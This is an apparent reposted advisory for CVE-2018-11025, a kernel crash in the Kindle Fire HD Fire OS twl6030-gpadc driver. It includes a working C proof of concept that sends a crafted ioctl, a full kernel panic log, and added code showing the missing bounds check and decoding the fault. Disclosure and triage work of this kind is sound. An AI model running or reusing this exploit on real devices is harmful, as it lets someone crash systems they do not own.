(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

admin, 2022-01-06 00:43:04, 66 views, 13274 characters, 44 min 14 s read

1. Vulnerability overview

The kernel module /omap/drivers/mfd/twl6030-gpadc.c in the kernel component of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to pass a specially crafted argument to the ioctl on the device file /dev/twl6030-gpadc with command 24832 and crash the kernel.

To trigger this vulnerability, the device file /dev/twl6030-gpadc must be opened and the ioctl system call invoked on it with command 24832 and a crafted payload as the third argument.
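The failure mode described above, a caller-supplied channel number used as an index before it is validated, is shown below as an added example. It is a constructed user-space model, not the twl6030-gpadc driver's source: the struct layout and the command value come from the advisory and its PoC, while the table size (GPADC_NUM_CHANNELS), the table contents and the function names are assumptions for the model. The unchecked handler reproduces the pattern; the checked handler adds the single bounds test that turns a kernel oops into an -EINVAL return.

```c
/*
 * Added example (constructed; not the twl6030-gpadc driver's source):
 * a user-space model of an ioctl handler whose per-channel table is
 * indexed by a caller-supplied channel number. The unchecked form mirrors
 * the failure mode; the checked form adds the bounds test that turns a
 * kernel oops into an -EINVAL return. Table size and contents are
 * assumptions for the model.
 */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

#define GPADC_IOCTL_CONVERT 24832u   /* command value from the advisory */
#define GPADC_NUM_CHANNELS  17       /* assumed size of the channel table */

/* Argument layout the PoC passes as the third ioctl argument. */
struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};

/* Constructed per-channel values standing in for the driver's table. */
static const int gpadc_table[GPADC_NUM_CHANNELS] = {
    100, 101, 102, 103, 104, 105, 106, 107, 108,
    109, 110, 111, 112, 113, 114, 115, 116,
};

/* Vulnerable form: uses up->channel as an index without checking it.
 * A value such as 0x9b2a9212 reads far outside the table; in the kernel
 * that read hits an unmapped address and produces the oops in the crash
 * log. Only ever call this with a channel you already validated. */
int gpadc_ioctl_unchecked(unsigned int cmd, struct twl6030_gpadc_user_parms *up) {
    if (cmd != GPADC_IOCTL_CONVERT)
        return -ENOTTY;
    up->result = (unsigned short)gpadc_table[up->channel];  /* no bounds check */
    up->status = 0;
    return 0;
}

/* Hardened form: validate the index before it reaches memory. Comparing
 * as unsigned rejects negative channels (0x9b2a9212 is negative as an
 * int) with the same single test. In a real driver this check sits right
 * after copy_from_user() fills the struct. */
int gpadc_ioctl_checked(unsigned int cmd, struct twl6030_gpadc_user_parms *up) {
    if (cmd != GPADC_IOCTL_CONVERT)
        return -ENOTTY;
    if ((unsigned int)up->channel >= GPADC_NUM_CHANNELS)
        return -EINVAL;
    up->result = (unsigned short)gpadc_table[up->channel];
    up->status = 0;
    return 0;
}

/* Runs the checked handler for one channel; returns the handler's rc and
 * stores the converted value when the call succeeds. */
int convert_channel(int channel, unsigned short *result_out) {
    struct twl6030_gpadc_user_parms p = { .channel = channel, .status = 0, .result = 0 };
    int rc = gpadc_ioctl_checked(GPADC_IOCTL_CONVERT, &p);
    if (rc == 0 && result_out != NULL)
        *result_out = p.result;
    return rc;
}

int main(void) {
    unsigned short value = 0;
    int rc = convert_channel(3, &value);
    printf("channel 3: rc=%d result=%u\n", rc, value);
    rc = convert_channel((int)0x9b2a9212u, &value);   /* the PoC's channel value */
    printf("channel 0x9b2a9212: rc=%d (%s)\n", rc, rc == -EINVAL ? "rejected" : "accepted");
    return 0;
}
```

The unsigned comparison is the detail worth keeping: channel is a signed int from user space, and a separate "channel < 0" test is easy to forget, whereas one unsigned compare against the table size covers both directions.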

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

/*
 * PoC for the Kindle Fire HD (3rd generation).
 * A bug in the ioctl interface of the device file /dev/twl6030-gpadc
 * crashes the system via IOCTL 24832.
 *
 * This PoC must run with permission to open and ioctl /dev/twl6030-gpadc.
 */
#include <stdio.h>
#include <stdlib.h>      /* system() */
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>      /* close() */
#include <sys/ioctl.h>

static const char *driver = "/dev/twl6030-gpadc";
static const int command = 24832;   /* ioctl command handled by twl6030_gpadc_ioctl */

/* Argument layout expected by the driver's ioctl handler. */
struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};

int main(void) {
    struct twl6030_gpadc_user_parms payload;
    payload.channel = 0x9b2a9212;   /* out-of-range channel index */
    payload.status = 0x0;
    payload.result = 0x0;

    int fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log");
        return -1;
    }

    printf("Try ioctl on device file '%s', with command 0x%x and crafted payload\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, &payload) < 0) {
        printf("ioctl failed, errno %d\n", errno);
        system("echo 2 > /data/local/tmp/log");
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

Crash log

[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013
[18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04
[18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec
[18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec
[18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001
[18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015
[18460.418609]
[18460.418609] PC: 0xc031b000:
[18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544]
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571]
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629]
[18460.688659] FP: 0xde94de84:
[18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625]
[18460.778625] R1: 0xde94de68:
[18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713]
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709]
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828]
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace:
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
[18461.401061] Board Information:
[18461.401061] Revision : 0001
[18461.401092] Serial : 0000000000000000
[18461.401092] SoC Information:
[18461.401092] CPU : OMAP4470
[18461.401122] Rev : ES1.0
[18461.401122] Type : HS
[18461.401122] Production ID: 0002B975-000000CC
[18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153]
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace:
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498]
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]
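The oops above carries enough to confirm what the PoC hit. The five words on the `Code:` line are standard ARM A32 encodings and decode to sub r1, fp, #0x1c; movw r3, #0xfeb4; movt r3, #0xffff; add r2, r1, r2, lsl #2; ldr r2, [r2, #-0x134] (the parenthesised, faulting word). With fp = 0xde94df04 from the register dump and r2 holding the PoC's channel value 0x9b2a9212 before the add, that chain yields r1 = 0xde94dee8 and r2 = 0x4b3f2730, both matching the dump, and a load address of 0x4b3f25fc, which is exactly the "Unable to handle kernel paging request" address. The r3 constant is set up for a later instruction and does not enter the address computation. In other words, the handler reads a word at (frame-relative base) + channel*4 with no range check on channel. The helper below, added here and not part of the original post or of the driver, replays that arithmetic: the instruction words and register values are copied from the log, and the three decoders are generic A32 field extractors, so the same helper can be pointed at another oops by swapping the constants.

```c
/*
 * Added triage helper (not code from the advisory or the driver): replays
 * the instructions on the oops's "Code:" line against the dumped
 * registers to confirm where the faulting load pointed. Instruction words
 * and register values below are copied from the crash log; the decoders
 * are generic ARM A32 field extractors.
 */
#include <stdint.h>
#include <stdio.h>

/* Instruction words from the "Code:" line; the last one faulted. */
static const uint32_t CODE_WORDS[] = {
    0xe24b101c, /* sub  r1, fp, #0x1c               */
    0xe30f3eb4, /* movw r3, #0xfeb4                 */
    0xe34f3fff, /* movt r3, #0xffff                 */
    0xe0812102, /* add  r2, r1, r2, lsl #2          */
    0xe5122134, /* ldr  r2, [r2, #-0x134]  <- fault */
};

/* Values from the register dump that feed those instructions. */
#define OOPS_FP         0xde94df04u
#define OOPS_R1         0xde94dee8u
#define OOPS_R2         0x4b3f2730u
#define OOPS_FAULT_ADDR 0x4b3f25fcu
#define POC_CHANNEL     0x9b2a9212u   /* payload.channel from the PoC */

/* Rotated 8-bit immediate of a data-processing instruction (bits 11:0):
 * imm8 rotated right by 2 * rotate. */
uint32_t dp_immediate(uint32_t insn) {
    uint32_t imm8 = insn & 0xffu;
    uint32_t rot = ((insn >> 8) & 0xfu) * 2u;
    return rot ? (imm8 >> rot) | (imm8 << (32u - rot)) : imm8;
}

/* Immediate shift amount of a register-operand data-processing
 * instruction (bits 11:7). */
uint32_t reg_shift_amount(uint32_t insn) {
    return (insn >> 7) & 0x1fu;
}

/* Signed byte offset of an LDR/STR immediate form; bit 23 (U) selects
 * add or subtract. */
int32_t ldr_imm_offset(uint32_t insn) {
    int32_t imm12 = (int32_t)(insn & 0xfffu);
    return (insn & (1u << 23)) ? imm12 : -imm12;
}

/* Replay: r1 = fp - imm; r2 = r1 + (channel << shift); addr = r2 + off.
 * Arithmetic is mod 2^32, as on the 32-bit target. */
uint32_t replay_fault_address(uint32_t fp, uint32_t channel) {
    uint32_t r1 = fp - dp_immediate(CODE_WORDS[0]);
    uint32_t r2 = r1 + (channel << reg_shift_amount(CODE_WORDS[3]));
    return r2 + (uint32_t)ldr_imm_offset(CODE_WORDS[4]);
}

/* Address channel 0 would have read: the base of the indexed table. */
uint32_t table_base(uint32_t fp) {
    return replay_fault_address(fp, 0);
}

int main(void) {
    uint32_t r1 = OOPS_FP - dp_immediate(CODE_WORDS[0]);
    uint32_t addr = replay_fault_address(OOPS_FP, POC_CHANNEL);
    printf("r1:    dump %08x  replay %08x\n", (unsigned)OOPS_R1, (unsigned)r1);
    printf("fault: dump %08x  replay %08x\n", (unsigned)OOPS_FAULT_ADDR, (unsigned)addr);
    printf("table base (channel 0): %08x = fp - 0x%x\n",
           (unsigned)table_base(OOPS_FP), (unsigned)(OOPS_FP - table_base(OOPS_FP)));
    return addr == OOPS_FAULT_ADDR ? 0 : 1;
}
```

The replay matching the dump on r1, r2 and the fault address is the check that matters during triage: it rules out a coincidental crash elsewhere and pins the oops to the caller-controlled index, so the fix to look for is a range check on channel, not a locking or lifetime change.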

Source: ol4three.com | Author: ol4three

Article link (CN-SEC): http://cn-sec.com/archives/720865.html
